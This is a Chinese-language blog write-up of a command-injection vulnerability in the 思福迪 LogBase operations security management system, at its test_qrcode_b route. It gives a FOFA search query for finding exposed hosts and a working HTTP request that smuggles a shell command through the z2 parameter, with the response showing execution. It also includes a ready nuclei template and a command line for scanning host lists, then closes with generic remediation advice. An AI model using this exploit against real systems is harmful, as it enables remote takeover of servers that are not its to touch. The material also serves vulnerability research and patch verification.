_副本-iotk.png)
思福迪运维安全管理系统 test_qrcode_b RCE漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
漏洞影响
思福迪-LOGBASE
漏洞描述
思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞,可以导致服务器被攻击者远控。
FOFA搜索语句
app="思福迪-LOGBASE"_副本-bctx.png)
漏洞复现
向靶场发送如下数据包,在靶场上执行id命令
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL
z1=1&z2="|id;"&z3=bhost响应内容如下
HTTP/1.1 200 OK
Connection: close
Content-Length: 48
Content-Type: text/html; charset=utf-8
Date: Wed, 13 Dec 2023 10:41:57 GMT
Server: npaved
Strict-Transport-Security: max-age=31536000; includeSubDomains
uid=93(apache) gid=100(users) groups=100(users)证明存在漏洞
nuclei poc
poc文件内容如下,在本地创建id同名的yaml文件即可使用
id: SAFETY-test_qrcode_b-rce
info:
name: 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
author: fgz
severity: critical
description: '思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞,可以导致服务器被攻击者远控。'
tags: 2023,SAFETY,LogBase,思福迪,rce
metadata:
max-request: 3
fofa-query: app="思福迪-LOGBASE"
verified: true
http:
- method: POST
path:
- "{{BaseURL}}/bhost/test_qrcode_b"
headers:
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: "{{BaseURL}}"
Accept-Encoding: gzip
body: 'z1=1&z2="|id;"&z3=bhost'
unsafe: true
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body,'uid')"
运行POC
nuclei.exe -t SAFETY-test_qrcode_b-rce.yaml -l data/思福迪.txt_副本-xawl.png)
修复建议
以下是一些关于RCE漏洞的修复建议:
更新和修补:
确保应用程序和操作系统是最新版本,包括所有的安全更新和补丁。
及时应用供应商提供的安全更新,特别是涉及到可能导致RCE漏洞的软件组件。
输入验证和过滤:
对所有用户输入进行验证和过滤,确保只允许合法的数据进入系统。
使用白名单机制,仅接受符合预期格式和内容的输入。
最小化权限:
限制应用程序和服务的运行权限,确保它们只能执行必要的操作。
避免使用过高的权限级别,尽可能使用最小化的权限进行运行。
安全编程实践:
采用安全编程实践,避免使用不安全的函数和方法。
避免直接拼接用户输入到系统命令或查询中,而是使用参数化查询或绑定。
沙盒环境:
在可能的情况下,将应用程序部署在沙盒环境中,以隔离应用程序的执行环境,减少潜在攻击的影响范围。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
